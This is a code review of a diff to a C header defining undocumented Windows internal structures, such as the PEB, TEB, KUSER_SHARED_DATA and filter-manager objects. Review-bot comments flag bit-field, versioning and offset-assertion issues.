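Review bot: In `_MI_SYSTEM_CACHE_VIEW_ATTRIBUTES` the four bit-fields are direct members of `union { ... } u1`, so `NumberOfPtes`, `PartitionId`, `Spare` and `SectionOffset` all start at bit 0 and overlap, which is the same layout mistake this commit fixes in `EX_PUSH_LOCK`. If they are meant to be consecutive fields of one value, wrap them in an anonymous struct: `struct { ULONGLONG NumberOfPtes : 6; ... ULONGLONG SectionOffset : 48; };`. The widths as written add up to 66 bits, so at least one of them also needs checking against the symbols. The other bit-fields placed in unions in this hunk (`Red`/`Balance` over `ParentValue`, `Type` in `MI_REVERSE_VIEW_MAP`, `Writable` in `MMVIEW`) look like intentional overlays of the low bits of a pointer and would benefit from a comment saying so.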
@@ -4543,6 +5128,47 @@ typedef struct _RTL_CALLBACK_REGISTER {
LIST_ENTRY ListEntry;
} RTL_CALLBACK_REGISTER, *PRTL_CALLBACK_REGISTER;
+typedef
+VOID
+(*PPO_COALESCING_CALLBACK) (
+ _In_ ULONG Reason,
+ _In_ PDEVICE_OBJECT DeviceObject,
+ _In_ PVOID Context);
+
+typedef struct _PO_COALESCING_CALLBACK_V1 {
+ EX_PUSH_LOCK PushLock;
+ PVOID CoalescingCallback;
+ PVOID SelfPtr;
+ PPO_COALESCING_CALLBACK Callback;
+ BOOLEAN ClientOrServer;
+ PVOID Context;
+} PO_COALESCING_CALLBACK_V1, * PPO_COALESCING_CALLBACK_V1;
+
+typedef struct _PO_COALESCING_CALLBACK_V2 {
+ EX_PUSH_LOCK PushLock;
+ PVOID CoalescingCallback;
+ PVOID SelfPtr;
+ PPO_COALESCING_CALLBACK Callback;
+ BOOLEAN ClientOrServer;
+ PVOID Context;
+ LIST_ENTRY Link;
+ EX_CALLBACK ExCallback;
+} PO_COALESCING_CALLBACK_V2, * PPO_COALESCING_CALLBACK_V2;
+
+typedef
+BOOLEAN
+(*PNMI_CALLBACK)(
+ __in_opt PVOID Context,
+ __in BOOLEAN Handled
+ );
+
+typedef struct _KNMI_HANDLER_CALLBACK {
+ struct _KNMI_HANDLER_CALLBACK* Next;
+ PNMI_CALLBACK Callback;
+ PVOID Context;
+ PVOID Handle;
+} KNMI_HANDLER_CALLBACK, * PKNMI_HANDLER_CALLBACK;
+
/*
** Callbacks END
*/
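Review bot: `PO_COALESCING_CALLBACK_V1` and `PO_COALESCING_CALLBACK_V2` are added without any statement of which Windows builds each layout belongs to, unlike the `FLT_FILTER_V1..V4` definitions elsewhere in this commit, which carry a version comment and a `/* size: ... */` note. A reader has no way to tell which one to use when interpreting such an object, so I would add a line above each, for example `// <build range to be confirmed against symbols>`. As a matter of style, `PNMI_CALLBACK` uses the older `__in_opt` / `__in` annotations while `PPO_COALESCING_CALLBACK` right above it uses `_In_`; `_In_opt_ PVOID Context` and `_In_ BOOLEAN Handled` would match.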
@@ -4586,7 +5212,7 @@ typedef struct _RTL_PROCESS_MODULES {
*/
typedef enum _MEMORY_INFORMATION_CLASS {
- MemoryBasicInformation,
+ MemoryBasicInformation = 0,
MemoryWorkingSetInformation,
MemoryMappedFilenameInformation,
MemoryRegionInformation,
@@ -4598,6 +5224,7 @@ typedef enum _MEMORY_INFORMATION_CLASS {
MemoryEnclaveImageInformation,
MemoryBasicInformationCapped,
MemoryPhysicalContiguityInformation,
+ MemoryBadInformation,
MaxMemoryInfoClass
} MEMORY_INFORMATION_CLASS, *PMEMORY_INFORMATION_CLASS;
@@ -4753,7 +5380,7 @@ typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE];
#define RTL_MAX_DRIVE_LETTERS 32
#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001
-#define GDI_MAX_HANDLE_COUNT 0x4000
+#define GDI_MAX_HANDLE_COUNT 0x4000 //0xFFFF
// 32-bit definitions
typedef struct _STRING32 {
@@ -5183,6 +5810,11 @@ typedef struct _RTL_USER_PROCESS_PARAMETERS {
PVOID PackageDependencyData; //8+
ULONG ProcessGroupId;
// ULONG LoaderThreads;
+ // UNICODE_STRING RedirectionDllName;
+ // UNICODE_STRING HeapPartitionName;
+ // ULONGLONG* DefaultThreadpoolCpuSetMasks;
+ // ULONG DefaultThreadpoolCpuSetMaskCount;
+ // ULONG DefaultThreadpoolThreadMaximum;
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
typedef struct _PEB {
@@ -5321,6 +5953,26 @@ typedef struct _PEB {
};
};
ULONGLONG CsrServerReadOnlySharedMemoryBase;
+ //ULONGLONG TppWorkerpListLock;
+ //LIST_ENTRY TppWorkerpList;
+ //PVOID WaitOnAddressHashTable[128];
+ //PVOID TelemetryCoverageHeader;
+ //ULONG CloudFileFlags;
+ //ULONG CloudFileDiagFlags;
+ //CHAR PlaceholderCompatibilityMode;
+ //CHAR PlaceholderCompatibilityModeReserved[7];
+ //struct _LEAP_SECOND_DATA* LeapSecondData;
+ //union
+ //{
+ // ULONG LeapSecondFlags;
+ // struct
+ // {
+ // ULONG SixtySecondEnabled : 1;
+ // ULONG Reserved : 31;
+ // };
+ //};
+ //ULONG NtGlobalFlag2;
+ //ULONG64 ExtendedFeatureDisableMask;
} PEB, *PPEB;
typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
@@ -5473,7 +6125,11 @@ typedef struct _TEB {
USHORT DisableUserStackWalk : 1;
USHORT RtlExceptionAttached : 1;
USHORT InitialThread : 1;
- USHORT SpareSameTebBits : 1;
+ USHORT SessionAware : 1;
+ USHORT LoadOwner : 1;
+ USHORT LoaderWorker : 1;
+ USHORT SkipLoaderInit : 1;
+ USHORT SkipFileAPIBrokering : 1;
};
};
@@ -5483,6 +6139,13 @@ typedef struct _TEB {
ULONG LockCount;
ULONG SpareUlong0;
PVOID ResourceRetValue;
+ //PVOID ReservedForWdf;
+ //ULONGLONG ReservedForCrt;
+ //GUID EffectiveContainerId;
+ //ULONGLONG LastSleepCounter;
+ //ULONG SpinCallCount;
+ //UCHAR Padding8[4];
+ //ULONGLONG ExtendedFeatureDisableMask;
} TEB, *PTEB;
typedef struct _PROCESS_DEVICEMAP_INFORMATION {
@@ -5525,6 +6188,7 @@ __inline struct _PEB * NtCurrentPeb() { return NtCurrentTeb()->ProcessEnvironmen
#define ProcessChildProcessPolicy 13
#define ProcessSideChannelIsolationPolicy 14
#define ProcessUserShadowStackPolicy 15
+#define ProcessRedirectionTrustPolicy 16
typedef struct tagPROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10 {
union {
@@ -5633,7 +6297,7 @@ typedef struct tagPROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10 {
} DUMMYUNIONNAME;
} PROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10, *PPROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10;
-typedef struct _PROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10 {
+typedef struct tagPROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10 {
union {
DWORD Flags;
struct {
@@ -5646,7 +6310,7 @@ typedef struct _PROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10 {
} DUMMYUNIONNAME;
} PROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10, *PPROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10;
-typedef struct _PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10 {
+typedef struct tagPROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10 {
union {
DWORD Flags;
struct {
@@ -5657,7 +6321,7 @@ typedef struct _PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10 {
} DUMMYUNIONNAME;
} PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10, *PPROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10;
-typedef struct _PROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10 {
+typedef struct tagPROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10 {
union {
DWORD Flags;
struct {
@@ -5675,6 +6339,17 @@ typedef struct _PROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10 {
} DUMMYUNIONNAME;
} PROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10, * PPROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10;
+typedef struct tagPROCESS_MITIGATION_REDIRECTION_TRUST_POLICY_W10 {
+ union {
+ DWORD Flags;
+ struct {
+ DWORD EnforceRedirectionTrust : 1;
+ DWORD AuditRedirectionTrust : 1;
+ DWORD ReservedFlags : 30;
+ } DUMMYSTRUCTNAME;
+ } DUMMYUNIONNAME;
+} PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY_W10, * PPROCESS_MITIGATION_REDIRECTION_TRUST_POLICY_W10;
+
typedef struct _PROCESS_MITIGATION_POLICY_INFORMATION {
PROCESS_MITIGATION_POLICY Policy;
union
@@ -5693,6 +6368,7 @@ typedef struct _PROCESS_MITIGATION_POLICY_INFORMATION {
PROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10 ChildProcessPolicy;
PROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10 SideChannelIsolationPolicy;
PROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10 UserShadowStackPolicy;
+ PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY_W10 RedirectionTrustPolicy;
};
} PROCESS_MITIGATION_POLICY_INFORMATION, *PPROCESS_MITIGATION_POLICY_INFORMATION;
@@ -5842,15 +6518,16 @@ typedef struct _KUSER_SHARED_DATA {
union {
volatile KSYSTEM_TIME TickCount;
volatile ULONG64 TickCountQuad;
- ULONG ReservedTickCountOverlay[3];
+ struct {
+ ULONG ReservedTickCountOverlay[3];
+ ULONG TickCountPad[1];
+ };
};
- ULONG TickCountPad[1];
-
ULONG Cookie;
- ULONG CookiedPad;
+ ULONG CookiedPad[1];
- ULONG ConsoleSessionForegroundProcessId;
+ LONGLONG ConsoleSessionForegroundProcessId;
ULONGLONG TimeUpdateLock;
ULONGLONG BaselineSystemTimeQpc;
@@ -5893,29 +6570,152 @@ typedef struct _KUSER_SHARED_DATA {
XSTATE_CONFIGURATION XState;
+ KSYSTEM_TIME FeatureConfigurationChangeStamp;
+ ULONG Spare;
+
} KUSER_SHARED_DATA, *PKUSER_SHARED_DATA;
#include
#define USER_SHARED_DATA ((KUSER_SHARED_DATA * const)MM_SHARED_USER_DATA_VA)
+#if !defined(__midl) && !defined(MIDL_PASS)
+
+//
+// The overall size can change, but it must be the same for all architectures.
+//
+
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCountLowDeprecated) == 0x0);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCountMultiplier) == 0x4);
+C_ASSERT(__alignof(KSYSTEM_TIME) == 4);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, InterruptTime) == 0x08);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemTime) == 0x014);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneBias) == 0x020);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ImageNumberLow) == 0x02c);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ImageNumberHigh) == 0x02e);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtSystemRoot) == 0x030);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, MaxStackTraceDepth) == 0x238);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, CryptoExponent) == 0x23c);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneId) == 0x240);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, LargePageMinimum) == 0x244);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, AitSamplingValue) == 0x248);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, AppCompatFlag) == 0x24c);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, RNGSeedVersion) == 0x250);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, GlobalValidationRunlevel) == 0x258);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneBiasStamp) == 0x25c);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtBuildNumber) == 0x260);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtProductType) == 0x264);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ProductTypeIsValid) == 0x268);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NativeProcessorArchitecture) == 0x26a);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtMajorVersion) == 0x26c);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtMinorVersion) == 0x270);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ProcessorFeatures) == 0x274);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved1) == 0x2b4);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved3) == 0x2b8);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeSlip) == 0x2bc);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, AlternativeArchitecture) == 0x2c0);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemExpirationDate) == 0x2c8);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SuiteMask) == 0x2d0);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, KdDebuggerEnabled) == 0x2d4);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, MitigationPolicies) == 0x2d5);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ActiveConsoleId) == 0x2d8);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, DismountCount) == 0x2dc);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ComPlusPackage) == 0x2e0);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, LastSystemRITEventTickCount) == 0x2e4);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NumberOfPhysicalPages) == 0x2e8);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SafeBootMode) == 0x2ec);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, VirtualizationFlags) == 0x2ed);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved12) == 0x2ee);
+
+#if defined(_MSC_EXTENSIONS)
+
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SharedDataFlags) == 0x2f0);
+
+#endif
+
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TestRetInstruction) == 0x2f8);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcFrequency) == 0x300);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemCall) == 0x308);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemCallPad0) == 0x30c);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemCallPad) == 0x310);
+
+#if defined(_MSC_EXTENSIONS)
+
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCount) == 0x320);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCountQuad) == 0x320);
+
+#endif
+
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Cookie) == 0x330);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ConsoleSessionForegroundProcessId) == 0x338);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeUpdateLock) == 0x340);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, BaselineSystemTimeQpc) == 0x348);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, BaselineInterruptTimeQpc) == 0x350);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcSystemTimeIncrement) == 0x358);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcInterruptTimeIncrement) == 0x360);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcSystemTimeIncrementShift) == 0x368);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcInterruptTimeIncrementShift) == 0x369);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, UnparkedProcessorCount) == 0x36a);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, EnclaveFeatureMask) == 0x36c);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved8) == 0x37c);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, UserModeGlobalLogger) == 0x380);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ImageFileExecutionOptions) == 0x3a0);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, LangGenerationCount) == 0x3a4);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved4) == 0x3a8);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, InterruptTimeBias) == 0x3b0);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcBias) == 0x3b8);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ActiveProcessorCount) == 0x3c0);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ActiveGroupCount) == 0x3c4);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved9) == 0x3c5);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcData) == 0x3c6);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneBiasEffectiveStart) == 0x3c8);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneBiasEffectiveEnd) == 0x3d0);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, XState) == 0x3d8);
+
+#endif /* __midl | MIDL_PASS */
+
/*
** KUSER_SHARED_DATA END
*/
/*
-** FLT MANAGER START
+** MM UNLOADED DRIVERS START
*/
-#define FLTFL_MANDATORY_UNLOAD_IN_PROGRESS 0x1
-#define FLTFL_FILTERING_INITIATED 0x2
-#define FLTFL_NAME_PROVIDER 0x4
-#define FLTFL_SUPPORTS_PIPES_MAILSLOTS 0x8
+typedef struct _UNLOADED_DRIVERS {
+ UNICODE_STRING Name;
+ PVOID StartAddress;
+ PVOID EndAddress;
+ LARGE_INTEGER CurrentTime;
+} UNLOADED_DRIVERS, *PUNLOADED_DRIVERS;
-#define FLT_OBFL_DRAINING 0x1
-#define FLT_OBFL_ZOMBIED 0x2
-#define FLT_OBFL_TYPE_INSTANCE 0x1000000
-#define FLT_OBFL_TYPE_FILTER 0x2000000
-#define FLT_OBFL_TYPE_VOLUME 0x4000000
+#define MI_UNLOADED_DRIVERS 50
+
+/*
+** MM UNLOADED DRIVERS END
+*/
+
+
+/*
+** FLT MANAGER START
+*/
+typedef enum _FLT_FILTER_FLAGS {
+ FLTFL_MANDATORY_UNLOAD_IN_PROGRESS = 1,
+ FLTFL_FILTERING_INITIATED = 2,
+ FLTFL_NAME_PROVIDER = 4,
+ FLTFL_SUPPORTS_PIPES_MAILSLOTS = 8,
+ FLTFL_BACKED_BY_PAGEFILE = 16,
+ FLTFL_SUPPORTS_DAX_VOLUME = 32,
+ FLTFL_SUPPORTS_WCOS = 64,
+ FLTFL_FILTERS_READ_WRITE = 128,
+} FLT_FILTER_FLAGS, *PFLT_FILTER_FLAGS;
+
+typedef enum _FLT_OBJECT_FLAGS {
+ FLT_OBFL_DRAINING = 1,
+ FLT_OBFL_ZOMBIED = 2,
+ FLT_OBFL_TYPE_INSTANCE = 0x1000000,
+ FLT_OBFL_TYPE_FILTER = 0x2000000,
+ FLT_OBFL_TYPE_VOLUME = 0x4000000,
+} FLT_OBJECT_FLAGS, *PFLT_OBJECT_FLAGS;
typedef struct _FLT_OBJECT {
ULONG Flags;
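Review bot: The `C_ASSERT` list added after `KUSER_SHARED_DATA` stops at `XState` (0x3d8), so the two members this hunk appends behind it, `FeatureConfigurationChangeStamp` and `Spare`, are the only ones whose placement is left unchecked. Their offsets depend on `sizeof(XSTATE_CONFIGURATION)`, which is defined outside this hunk, so a stale definition of that type would shift them silently. I would close the list with `C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, FeatureConfigurationChangeStamp) == <offset taken from the target build's symbols>);` and a matching line for `Spare`. The comment above the list also speaks of the overall size, yet nothing asserts `sizeof(KUSER_SHARED_DATA)`.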
@@ -5924,6 +6724,15 @@ typedef struct _FLT_OBJECT {
LIST_ENTRY PrimaryLink;
} FLT_OBJECT, *PFLT_OBJECT;
+// Since w10 th1
+typedef struct _FLT_OBJECT_V2 {
+ ULONG Flags;
+ ULONG PointerCount;
+ EX_RUNDOWN_REF RundownRef;
+ LIST_ENTRY PrimaryLink;
+ GUID UniqueIdentifier;
+} FLT_OBJECT_V2, *PFLT_OBJECT_V2; /* size: 0x0030 */
+
typedef struct _FLT_SERVER_PORT_OBJECT {
LIST_ENTRY FilterLink;
PVOID ConnectNotify;
@@ -5932,9 +6741,171 @@ typedef struct _FLT_SERVER_PORT_OBJECT {
PVOID Filter;
PVOID Cookie;
ULONG Flags;
- ULONG NumberOfConnections;
- ULONG MaxConnections;
-} FLT_SERVER_PORT_OBJECT, *PFLT_SERVER_PORT_OBJECT;
+ LONG NumberOfConnections;
+ LONG MaxConnections;
+ LONG __PADDING__[1];
+} FLT_SERVER_PORT_OBJECT, *PFLT_SERVER_PORT_OBJECT; /* size: 0x0048 */
+
+typedef struct _FLT_RESOURCE_LIST_HEAD {
+ ERESOURCE rLock;
+ LIST_ENTRY rList;
+ ULONG rCount;
+ LONG __PADDING__[1];
+} FLT_RESOURCE_LIST_HEAD, *PFLT_RESOURCE_LIST_HEAD; /* size: 0x0080 */
+
+typedef struct _FLT_MUTEX_LIST_HEAD {
+ FAST_MUTEX mLock;
+ LIST_ENTRY mList;
+ union {
+ ULONG mCount;
+ struct {
+ UCHAR mInvalid : 1;
+ CHAR __PADDING__[7];
+ };
+ };
+} FLT_MUTEX_LIST_HEAD, *PFLT_MUTEX_LIST_HEAD; /* size: 0x0050 */
+
+// Windows 7 version
+typedef struct _FLT_FILTER_V1 {
+ /* 0x0000 */ FLT_OBJECT Base;
+ /* 0x0020 */ struct _FLTP_FRAME* Frame;
+ /* 0x0028 */ UNICODE_STRING Name;
+ /* 0x0038 */ UNICODE_STRING DefaultAltitude;
+ /* 0x0048 */ FLT_FILTER_FLAGS Flags;
+ /* 0x004c */ LONG Padding;
+ /* 0x0050 */ DRIVER_OBJECT* DriverObject;
+ /* 0x0058 */ FLT_RESOURCE_LIST_HEAD InstanceList;
+ /* 0x00d8 */ struct FLT_VERIFIER_EXTENSION* VerifierExtension;
+ /* 0x00e0 */ LIST_ENTRY VerifiedFiltersLink;
+ /* 0x00f0 */ PVOID FilterUnload /* function */;
+ /* 0x00f8 */ PVOID InstanceSetup /* function */;
+ /* 0x0100 */ PVOID InstanceQueryTeardown /* function */;
+ /* 0x0108 */ PVOID InstanceTeardownStart /* function */;
+ /* 0x0110 */ PVOID InstanceTeardownComplete /* function */;
+ /* 0x0118 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;
+ /* 0x0120 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[6];
+ /* 0x0150 */ PVOID PreVolumeMount /* function */;
+ /* 0x0158 */ PVOID PostVolumeMount /* function */;
+ /* 0x0160 */ PVOID GenerateFileName /* function */;
+ /* 0x0168 */ PVOID NormalizeNameComponent /* function */;
+ /* 0x0170 */ PVOID NormalizeNameComponentEx /* function */;
+ /* 0x0178 */ PVOID NormalizeContextCleanup /* function */;
+ /* 0x0180 */ PVOID KtmNotification /* function */;
+ /* 0x0188 */ struct _FLT_OPERATION_REGISTRATION* Operations;
+ /* 0x0190 */ PVOID OldDriverUnload /* function */;
+ /* 0x0198 */ FLT_MUTEX_LIST_HEAD ActiveOpens;
+ /* 0x01e8 */ FLT_MUTEX_LIST_HEAD ConnectionList;
+ /* 0x0238 */ FLT_MUTEX_LIST_HEAD PortList;
+ /* 0x0288 */ EX_PUSH_LOCK PortLock;
+} FLT_FILTER_V1, * PFLT_FILTER_V1; /* size: 0x0290 */
+
+// Windows 8/8.1 version
+typedef struct _FLT_FILTER_V2 {
+ /* 0x0000 */ FLT_OBJECT Base;
+ /* 0x0020 */ struct _FLTP_FRAME* Frame;
+ /* 0x0028 */ UNICODE_STRING Name;
+ /* 0x0038 */ UNICODE_STRING DefaultAltitude;
+ /* 0x0048 */ FLT_FILTER_FLAGS Flags;
+ /* 0x004c */ LONG Padding;
+ /* 0x0050 */ DRIVER_OBJECT* DriverObject;
+ /* 0x0058 */ FLT_RESOURCE_LIST_HEAD InstanceList;
+ /* 0x00d8 */ struct _FLT_VERIFIER_EXTENSION* VerifierExtension;
+ /* 0x00e0 */ LIST_ENTRY VerifiedFiltersLink;
+ /* 0x00f0 */ PVOID FilterUnload /* function */;
+ /* 0x00f8 */ PVOID InstanceSetup /* function */;
+ /* 0x0100 */ PVOID InstanceQueryTeardown /* function */;
+ /* 0x0108 */ PVOID InstanceTeardownStart /* function */;
+ /* 0x0110 */ PVOID InstanceTeardownComplete /* function */;
+ /* 0x0118 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;
+ /* 0x0120 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[7];
+ /* 0x0158 */ PVOID PreVolumeMount /* function */;
+ /* 0x0160 */ PVOID PostVolumeMount /* function */;
+ /* 0x0168 */ PVOID GenerateFileName /* function */;
+ /* 0x0170 */ PVOID NormalizeNameComponent /* function */;
+ /* 0x0178 */ PVOID NormalizeNameComponentEx /* function */;
+ /* 0x0180 */ PVOID NormalizeContextCleanup /* function */;
+ /* 0x0188 */ PVOID KtmNotification /* function */;
+ /* 0x0190 */ PVOID SectionNotification /* function */; //SINCE 8.1
+ /* 0x0198 */ struct _FLT_OPERATION_REGISTRATION* Operations;
+ /* 0x01a0 */ PVOID OldDriverUnload /* function */;
+ /* 0x01a8 */ FLT_MUTEX_LIST_HEAD ActiveOpens;
+ /* 0x01f8 */ FLT_MUTEX_LIST_HEAD ConnectionList;
+ /* 0x0248 */ FLT_MUTEX_LIST_HEAD PortList;
+ /* 0x0298 */ EX_PUSH_LOCK PortLock;
+} FLT_FILTER_V2, * PFLT_FILTER_V2; /* size: 0x02a0 */
+
+// Windows 10 version
+typedef struct _FLT_FILTER_V3 {
+ /* 0x0000 */ FLT_OBJECT_V2 Base;
+ /* 0x0030 */ struct _FLTP_FRAME* Frame;
+ /* 0x0038 */ UNICODE_STRING Name;
+ /* 0x0048 */ UNICODE_STRING DefaultAltitude;
+ /* 0x0058 */ FLT_FILTER_FLAGS Flags;
+ /* 0x005c */ LONG Padding;
+ /* 0x0060 */ DRIVER_OBJECT* DriverObject;
+ /* 0x0068 */ FLT_RESOURCE_LIST_HEAD InstanceList;
+ /* 0x00e8 */ struct _FLT_VERIFIER_EXTENSION* VerifierExtension;
+ /* 0x00f0 */ LIST_ENTRY VerifiedFiltersLink;
+ /* 0x0100 */ PVOID FilterUnload /* function */;
+ /* 0x0108 */ PVOID InstanceSetup /* function */;
+ /* 0x0110 */ PVOID InstanceQueryTeardown /* function */;
+ /* 0x0118 */ PVOID InstanceTeardownStart /* function */;
+ /* 0x0120 */ PVOID InstanceTeardownComplete /* function */;
+ /* 0x0128 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;
+ /* 0x0130 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[7];
+ /* 0x0168 */ PVOID PreVolumeMount /* function */;
+ /* 0x0170 */ PVOID PostVolumeMount /* function */;
+ /* 0x0178 */ PVOID GenerateFileName /* function */;
+ /* 0x0180 */ PVOID NormalizeNameComponent /* function */;
+ /* 0x0188 */ PVOID NormalizeNameComponentEx /* function */;
+ /* 0x0190 */ PVOID NormalizeContextCleanup /* function */;
+ /* 0x0198 */ PVOID KtmNotification /* function */;
+ /* 0x01a0 */ PVOID SectionNotification /* function */;
+ /* 0x01a8 */ struct _FLT_OPERATION_REGISTRATION* Operations;
+ /* 0x01b0 */ PVOID OldDriverUnload /* function */;
+ /* 0x01b8 */ FLT_MUTEX_LIST_HEAD ActiveOpens;
+ /* 0x0208 */ FLT_MUTEX_LIST_HEAD ConnectionList;
+ /* 0x0258 */ FLT_MUTEX_LIST_HEAD PortList;
+ /* 0x02a8 */ EX_PUSH_LOCK PortLock;
+} FLT_FILTER_V3, *PFLT_FILTER_V3; /* size: 0x02b0 */
+
+// Windows 10/11+ (22000)
+typedef struct _FLT_FILTER_V4 {
+ /* 0x0000 */ FLT_OBJECT_V2 Base;
+ /* 0x0030 */ struct _FLTP_FRAME* Frame;
+ /* 0x0038 */ UNICODE_STRING Name;
+ /* 0x0048 */ UNICODE_STRING DefaultAltitude;
+ /* 0x0058 */ FLT_FILTER_FLAGS Flags;
+ /* 0x005c */ LONG Padding;
+ /* 0x0060 */ DRIVER_OBJECT* DriverObject;
+ /* 0x0068 */ FLT_RESOURCE_LIST_HEAD InstanceList;
+ /* 0x00e8 */ struct _FLT_VERIFIER_EXTENSION* VerifierExtension;
+ /* 0x00f0 */ LIST_ENTRY VerifiedFiltersLink;
